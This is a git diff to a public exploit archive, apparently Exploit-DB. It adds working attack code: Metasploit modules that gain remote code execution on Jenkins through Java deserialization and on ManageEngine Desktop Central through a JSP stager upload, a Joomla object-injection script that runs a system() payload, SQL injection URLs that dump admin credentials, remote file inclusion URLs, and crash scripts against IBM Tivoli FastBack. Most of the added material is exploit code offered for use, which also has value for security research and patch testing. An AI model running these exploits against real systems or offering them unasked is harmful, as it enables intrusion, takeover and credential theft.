diff --git a/files.csv b/files.csv
index 780f67fb8..625d500cc 100755
--- a/files.csv
+++ b/files.csv
@@ -35232,3 +35232,15 @@ id,file,description,date,author,platform,type,port
38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0
38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80
38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80
+38977,platforms/php/remote/38977.py,"Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,remote,0
+38978,platforms/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",windows,dos,11460
+38979,platforms/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
+38980,platforms/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
+38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80
+38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020
+38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080
+38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38988,platforms/php/webapps/38988.txt,"Dredge School Administration System /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion Vulnerabilities",2015-12-15,bd0rk,php,webapps,80
diff --git a/platforms/java/remote/38983.rb b/platforms/java/remote/38983.rb
new file mode 100755
index 000000000..395094964
--- /dev/null
+++ b/platforms/java/remote/38983.rb
@@ -0,0 +1,263 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',
+ 'Description' => %q{
+ This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
+ the Jenkins master, which allows remote arbitrary code execution. Authentication is not
+ required to exploit this vulnerability.
+ },
+ 'Author' =>
+ [
+ 'Christopher Frohoff', # Vulnerability discovery
+ 'Steve Breen', # Public Exploit
+ 'Dev Mohanty', # Metasploit module
+ 'Louis Sato', # Metasploit
+ 'William Vu', # Metasploit
+ 'juan vazquez', # Metasploit
+ 'Wei Chen' # Metasploit
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2015-8103'],
+ ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
+ ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
+ ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
+ ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
+ ],
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'Jenkins 1.637', {} ]
+ ],
+ 'DisclosureDate' => 'Nov 18 2015',
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
+ OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
+ Opt::RPORT('8080')
+ ], self.class)
+ end
+
+ def exploit
+ unless vulnerable?
+ fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
+ end
+ invoke_remote_method(set_payload)
+ invoke_remote_method(class_load_payload)
+ end
+
+
+ # This is from the HttpClient mixin. But since this module isn't actually exploiting
+ # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
+ # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.
+
+ def target_uri
+ begin
+ # In case TARGETURI is empty, at least we default to '/'
+ u = datastore['TARGETURI']
+ u = "/" if u.nil? or u.empty?
+ URI(u)
+ rescue ::URI::InvalidURIError
+ print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
+ raise Msf::OptionValidateError.new(['TARGETURI'])
+ end
+ end
+
+ def normalize_uri(*strs)
+ new_str = strs * "/"
+
+ new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+ # Makes sure there's a starting slash
+ unless new_str[0,1] == '/'
+ new_str = '/' + new_str
+ end
+
+ new_str
+ end
+
+ def check
+ result = Exploit::CheckCode::Safe
+
+ begin
+ if vulnerable?
+ result = Exploit::CheckCode::Vulnerable
+ end
+ rescue Msf::Exploit::Failed => e
+ vprint_error(e.message)
+ return Exploit::CheckCode::Unknown
+ end
+
+ result
+ end
+
+ def vulnerable?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ unless res
+ fail_with(Failure::Unknown, 'The connection timed out.')
+ end
+
+ http_headers = res.headers
+
+ unless http_headers['X-Jenkins-CLI-Port']
+ vprint_error('The server does not have the CLI port that is needed for exploitation.')
+ return false
+ end
+
+ if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
+ @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
+ return true
+ end
+
+ false
+ end
+
+ # Connects to the server, creates a request, sends the request,
+ # reads the response
+ #
+ # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
+ #
+ def send_request_cgi(opts={}, timeout = 20)
+ if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
+ actual_timeout = datastore['HttpClientTimeout']
+ else
+ actual_timeout = opts[:timeout] || timeout
+ end
+
+ begin
+ c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
+ c.connect
+ r = c.request_cgi(opts)
+ c.send_recv(r, actual_timeout)
+ rescue ::Errno::EPIPE, ::Timeout::Error
+ nil
+ end
+ end
+
+ def invoke_remote_method(serialized_java_stream)
+ begin
+ socket = connect(true, {'RPORT' => @jenkins_cli_port})
+
+ print_status 'Sending headers...'
+ socket.put(read_bin_file('serialized_jenkins_header'))
+
+ vprint_status(socket.recv(1024))
+ vprint_status(socket.recv(1024))
+
+ encoded_payload0 = read_bin_file('serialized_payload_header')
+ encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
+ encoded_payload2 = read_bin_file('serialized_payload_footer')
+
+ encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
+ print_status "Sending payload length: #{encoded_payload.length}"
+ socket.put(encoded_payload)
+ ensure
+ disconnect(socket)
+ end
+
+ end
+
+ def print_status(msg='')
+ super("#{rhost}:#{rport} - #{msg}")
+ end
+
+ #
+ # Serialized stream generated with:
+ # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
+ #
+ def set_payload
+ stream = Rex::Java::Serialization::Model::Stream.new
+
+ handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
+ decoded = stream.decode(handle)
+ handle.close
+
+ inject_payload_into_stream(decoded).encode
+ end
+
+ #
+ # Serialized stream generated with:
+ # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
+ #
+ def class_load_payload
+ stream = Rex::Java::Serialization::Model::Stream.new
+ handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
+ decoded = stream.decode(handle)
+ handle.close
+ inject_class_loader_into_stream(decoded).encode
+ end
+
+ def inject_class_loader_into_stream(decoded)
+ file_name_utf8 = get_array_chain(decoded)
+ .values[2]
+ .class_data[0]
+ .values[1]
+ .values[0]
+ .values[0]
+ .class_data[3]
+ file_name_utf8.contents = get_random_file_name
+ file_name_utf8.length = file_name_utf8.contents.length
+ class_name_utf8 = get_array_chain(decoded)
+ .values[4]
+ .class_data[0]
+ .values[0]
+ class_name_utf8.contents = 'metasploit.Payload'
+ class_name_utf8.length = class_name_utf8.contents.length
+ decoded
+ end
+
+ def get_random_file_name
+ @random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
+ end
+
+ def inject_payload_into_stream(decoded)
+ byte_array = get_array_chain(decoded)
+ .values[2]
+ .class_data
+ .last
+ byte_array.values = payload.encoded.bytes
+ file_name_utf8 = decoded.references[44].class_data[0]
+ rnd_fname = get_random_file_name
+ register_file_for_cleanup(rnd_fname)
+ file_name_utf8.contents = rnd_fname
+ file_name_utf8.length = file_name_utf8.contents.length
+ decoded
+ end
+
+ def get_array_chain(decoded)
+ object = decoded.contents[0]
+ lazy_map = object.class_data[1].class_data[0]
+ chained_transformer = lazy_map.class_data[0]
+ chained_transformer.class_data[0]
+ end
+
+ def read_bin_file(bin_file_path)
+ data = ''
+
+ File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
+ data = f.read
+ end
+
+ data
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/jsp/remote/38982.rb b/platforms/jsp/remote/38982.rb
new file mode 100755
index 000000000..f9b2e5265
--- /dev/null
+++ b/platforms/jsp/remote/38982.rb
@@ -0,0 +1,212 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in ManageEngine Desktop Central 9. When
+ uploading a 7z file, the FileUploadServlet class does not check the user-controlled
+ ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to
+ inject a null bye at the end of the value to create a malicious file with an arbitrary
+ file type, and then place it under a directory that allows server-side scripts to run,
+ which results in remote code execution under the context of SYSTEM.
+
+ Please note that by default, some ManageEngine Desktop Central versions run on port 8020,
+ but older ones run on port 8040. Also, using this exploit will leave debugging information
+ produced by FileUploadServlet in file rdslog0.txt.
+
+ This exploit was successfully tested on version 9, build 90109 and build 91084.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r' ],
+ 'References' =>
+ [
+ [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ],
+ [ 'CVE', '2015-8249']
+ ],
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'ManageEngine Desktop Central 9 on Windows', {} ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00"
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => "Dec 14 2015",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),
+ Opt::RPORT(8020)
+ ], self.class)
+ end
+
+ def jsp_drop_bin(bin_data, output_file)
+ jspraw = %Q|<%@ page import="java.io.*" %>\n|
+ jspraw << %Q|<%\n|
+ jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+ jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+ jspraw << %Q|int numbytes = data.length();\n|
+
+ jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+ jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+ jspraw << %Q|{\n|
+ jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
+ jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
+ jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
+ jspraw << %Q| comb <<= 4;\n|
+ jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
+ jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
+ jspraw << %Q|}\n|
+
+ jspraw << %Q|outputstream.write(bytes);\n|
+ jspraw << %Q|outputstream.close();\n|
+ jspraw << %Q|%>\n|
+
+ jspraw
+ end
+
+ def jsp_execute_command(command)
+ jspraw = %Q|<%@ page import="java.io.*" %>\n|
+ jspraw << %Q|<%\n|
+ jspraw << %Q|try {\n|
+ jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
+ jspraw << %Q|} catch (IOException ioe) { }\n|
+ jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
+ jspraw << %Q|%>\n|
+
+ jspraw
+ end
+
+ def get_jsp_stager
+ exe = generate_payload_exe(code: payload.encoded)
+ jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp"
+ # pwd: C:\ManageEngine\DesktopCentral_Server\bin
+ # targeted location: C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
+ register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}")
+
+ {
+ jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),
+ jsp_name: jsp_fname
+ }
+ end
+
+ def get_build_number(res)
+ inputs = res.get_hidden_inputs
+ # The buildNum input is in the first form
+ inputs.first['buildNum']
+ end
+
+ def get_html_title(res)
+ html = res.body
+ n = ::Nokogiri::HTML(html)
+ n.at_xpath('//title').text
+ end
+
+ def check
+ uri = normalize_uri(target_uri.path, '/configurations.do')
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ vprint_error("Connection timed out")
+ return Exploit::CheckCode::Unknown
+ end
+
+ build_number = get_build_number(res)
+ vprint_status("Found build number: #{build_number}")
+
+ html_title = get_html_title(res)
+ vprint_status("Found title: #{html_title}")
+
+ if build_number <= '91084'
+ return Exploit::CheckCode::Appears
+ elsif /ManageEngine Desktop Central/ === html_title
+ return Exploit::CheckCode::Detected
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def upload_jsp(stager_info)
+ # connectionId is part of the 7z filename
+ # computerName is part of the 7z filename (but will be used due to the null byte injection)
+ # customerId is used as a directory name
+ #
+ # The intended upload path is:
+ # C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\server-data\[customerId]\rds\scr-rec\null-computerName-connectionId.7z
+ # But this will upload to:
+ # C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
+
+ uri = normalize_uri(target_uri.path, 'fileupload')
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'ctype' => 'application/octet-stream',
+ 'encode_params' => false,
+ 'data' => stager_info[:jsp_payload],
+ 'vars_get' => {
+ 'connectionId' => "#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00",
+ 'resourceId' => Rex::Text.rand_text_alpha(1),
+ 'action' => 'rds_file_upload',
+ 'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),
+ 'customerId' => Rex::Text.rand_text_numeric(rand(10)+5)
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}")
+ elsif res && res.code != 200
+ fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.")
+ end
+ end
+
+ def exec_jsp(stager_info)
+ uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ if res.nil?
+ fail_with(Failure::Unknown, "Connection timed out while executing #{uri}")
+ elsif res && res.code != 200
+ fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}")
+ end
+ end
+
+ def exploit
+ print_status("Creating JSP stager")
+ stager_info = get_jsp_stager
+
+ print_status("Uploading JSP stager #{stager_info[:jsp_name]}...")
+ upload_jsp(stager_info)
+
+ print_status("Executing stager...")
+ exec_jsp(stager_info)
+ end
+
+end
diff --git a/platforms/php/remote/38977.py b/platforms/php/remote/38977.py
new file mode 100755
index 000000000..ed3c04082
--- /dev/null
+++ b/platforms/php/remote/38977.py
@@ -0,0 +1,44 @@
+'''
+ Simple PoC for Joomla Object Injection.
+ Gary @ Sec-1 ltd
+ http://www.sec-1.com/
+'''
+
+import requests # easy_install requests
+
+def get_url(url, user_agent):
+
+ headers = {
+ 'User-Agent': user_agent
+ }
+ cookies = requests.get(url,headers=headers).cookies
+ for _ in range(3):
+ response = requests.get(url, headers=headers,cookies=cookies)
+ return response
+
+def php_str_noquotes(data):
+ "Convert string to chr(xx).chr(xx) for use in php"
+ encoded = ""
+ for char in data:
+ encoded += "chr({0}).".format(ord(char))
+
+ return encoded[:-1]
+
+
+def generate_payload(php_payload):
+
+ php_payload = "eval({0})".format(php_str_noquotes(php_payload))
+
+ terminate = '\xf0\xfd\xfd\xfd';
+ exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
+ injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
+ exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
+ exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
+
+ return exploit_template
+
+
+
+pl = generate_payload("system('touch /tmp/fx');")
+
+print get_url("http://172.31.6.242/", pl)
\ No newline at end of file
diff --git a/platforms/php/webapps/28564.txt b/platforms/php/webapps/28564.txt
index 90cf84bbe..5d37a8b23 100755
--- a/platforms/php/webapps/28564.txt
+++ b/platforms/php/webapps/28564.txt
@@ -17,10 +17,6 @@ Cross Site Scripting
http://site-target/search.php?s=[XSS]
-Example
-
-http://www.freearticle.com.au/search.php?s=
-
#XSS at Page Admin
@@ -36,18 +32,8 @@ http://site-target/search.php?s=[SQL Injection]
Example
-http://www.freearticle.com.au/feed.php?cat=100'
-http://www.freearticle.com.au/search.php?s=123'
+http://site-target/feed.php?cat=100'
+http://site-target/search.php?s=123'
====================================================================================
-Example Target
-
-http://freearticle.com.au/feed.php?cat=100'
-http://alfithrah99.net/artikel/feed.php?cat=2'
-http://demos1.softaculous.com/ArticleSetup/feed.php?cat=100'
-http://oromodictionary.com/articles/feed.php?cat=1'
-http://beingshoppers.com/article/feed.php?cat=44'
-http://acheon.eu/article/feed.php?cat=54'
-http://sitevena.com/feed.php?cat=12'
-http://www.articleshub.in/feed.php?cat=10'
\ No newline at end of file
diff --git a/platforms/php/webapps/38981.txt b/platforms/php/webapps/38981.txt
new file mode 100755
index 000000000..9119922da
--- /dev/null
+++ b/platforms/php/webapps/38981.txt
@@ -0,0 +1,26 @@
+# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
+# Author: bd0rk
+# eMail: bd0rk[at]hackermail.com
+# Tested on: Ubuntu-Linux
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
+
+
+Proof-of-Concept:
+
+/absences-2-64/programs/planning.php line 26
+---------------------------------------------------------------
+
+require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
+
+---------------------------------------------------------------
+
+[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
+
+
+Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
+ So an attacker can use this to execute some php-shellcode for example.
+
+
+### The 27 years old, german hacker bd0rk ###
+
+
diff --git a/platforms/php/webapps/38985.txt b/platforms/php/webapps/38985.txt
new file mode 100755
index 000000000..cdd9023e3
--- /dev/null
+++ b/platforms/php/webapps/38985.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/64720/info
+
+Dredge School Administration System is prone to the following security vulnerabilities:
+
+1. An SQL-injection vulnerability
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An information-disclosure vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
+
+Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
+
+http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
+
+http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff
\ No newline at end of file
diff --git a/platforms/php/webapps/38986.txt b/platforms/php/webapps/38986.txt
new file mode 100755
index 000000000..348d4a32b
--- /dev/null
+++ b/platforms/php/webapps/38986.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/64720/info
+
+Dredge School Administration System is prone to the following security vulnerabilities:
+
+1. An SQL-injection vulnerability
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An information-disclosure vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
+
+Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
+
+
+Iphobos Blog
+
+
+
diff --git a/platforms/php/webapps/38987.html b/platforms/php/webapps/38987.html
new file mode 100755
index 000000000..0c00d8ee1
--- /dev/null
+++ b/platforms/php/webapps/38987.html
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/64720/info
+
+Dredge School Administration System is prone to the following security vulnerabilities:
+
+1. An SQL-injection vulnerability
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An information-disclosure vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
+
+Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
+
+[Change Password & Email Admin]
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/38988.txt b/platforms/php/webapps/38988.txt
new file mode 100755
index 000000000..d222fa117
--- /dev/null
+++ b/platforms/php/webapps/38988.txt
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/64720/info
+
+Dredge School Administration System is prone to the following security vulnerabilities:
+
+1. An SQL-injection vulnerability
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An information-disclosure vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
+
+Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
+
+II. Backup Download
+
+##############
+VULNERABILITY
+##############
+
+/Backup/processbackup.php (LINE: 89-93)
+
+-----------------------------------------------------------------------------
+ //save file
+ // $handle =
+fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
+ $handle = fopen('RecordManager.sql','w+');
+ fwrite($handle,$return);
+ fclose($handle);
+
+-----------------------------------------------------------------------------
+
+#####################################################
+EXPLOIT
+#####################################################
+
+1. Open http://www.example.com/DSM/Backup/processbackup.php
+2. When you open the link produces RecordManager.sql
+3. to download backup [http://www.example.com/DSM/Backup/RecordManager.sql]
\ No newline at end of file
diff --git a/platforms/php/webapps/38989.txt b/platforms/php/webapps/38989.txt
new file mode 100755
index 000000000..f25f0bb7d
--- /dev/null
+++ b/platforms/php/webapps/38989.txt
@@ -0,0 +1,42 @@
+# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
+# Author: bd0rk
+# eMail: bd0rk[at]hackermail.com
+# Twitter: twitter.com/bd0rk
+# Tested on: Ubuntu-Linux
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792
+
+PoC1:
+
+/bulletindoc-2-9/programs/admin.php line 2
+------------------------------------------------------
+
+include $babInstallPath."admin/acl.php";
+
+------------------------------------------------------
+
+[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]
+
+Description: The $babInstallPath-parameter isn't declared before include.
+ So an attacker can execute evil-code 'bout this.
+
+
+
+PoC2:
+
+/bulletindoc-2-9/programs/main.php line 2
+-------------------------------------------------------
+
+require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
+
+-------------------------------------------------------
+
+[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
+
+Description: The problem is the same as the first. -.-
+ It's possible to compromise the system.
+
+### The 27 years old, german hacker bd0rk ###
+
+Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
+
+
diff --git a/platforms/windows/dos/38978.py b/platforms/windows/dos/38978.py
new file mode 100755
index 000000000..9ddde76a7
--- /dev/null
+++ b/platforms/windows/dos/38978.py
@@ -0,0 +1,92 @@
+#!/usr/bin/python
+#
+################################################################################
+#
+# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
+# Invalid Pointer Dereference
+# Date: 14 December 2015
+# Author: Gianni Gnesa (gnix)
+#
+# Vendor Homepage: http://www.ibm.com/
+# Software Name: IBM Tivoli Storage Manager FastBack
+# Software Version: 5.5.4.2 (x86)
+# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
+# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
+# (Version 5.5.4.2, Size: 120.7 MB)
+#
+# Tested on: Windows 7 Professional (x86)
+#
+################################################################################
+#
+# Crash:
+# ======
+#
+# (f60.654): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=41414141 ebx=01bf4fb8 ecx=41414141 edx=41414141 esi=01bf4fb8 edi=00000000
+# eip=0063d84a esp=01dce0c8 ebp=01dce0cc iopl=0 nv up ei pl nz na pe nc
+# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+# FastBackServer!CLocation::GetLocationParams+0xa:
+# 0063d84a 8b4004 mov eax,dword ptr [eax+4] ds:0023:41414145=????????
+#
+################################################################################
+
+import sys
+import time
+import socket
+from struct import pack
+
+
+def create_pkt(opcode, p1="", p2="", p3=""):
+
+ # psAgentCommand (0x30 bytes)
+ buf = "\x44" * 0xC
+ buf+= pack("i", len(buf)-4) + buf
+
+ return buf
+
+
+def main():
+ if len(sys.argv) != 2:
+ print "Usage: %s \n" % sys.argv[0]
+ sys.exit(1)
+
+ server = sys.argv[1]
+ port = 11460
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((server, port))
+
+ pkt = create_pkt( opcode = 0x537,
+ p1 = "A" * 24000,
+ p2 = "B" * 24000,
+ p3 = "C" * 1000 )
+
+ s.send(pkt)
+ s.close()
+
+ print "[+] Packet sent."
+ sys.exit(0)
+
+
+if __name__ == "__main__":
+ main()
diff --git a/platforms/windows/dos/38979.py b/platforms/windows/dos/38979.py
new file mode 100755
index 000000000..732727959
--- /dev/null
+++ b/platforms/windows/dos/38979.py
@@ -0,0 +1,115 @@
+#!/usr/bin/python
+#
+################################################################################
+#
+# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
+# _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability
+# Date: 14 December 2015
+# Author: Gianni Gnesa (gnix)
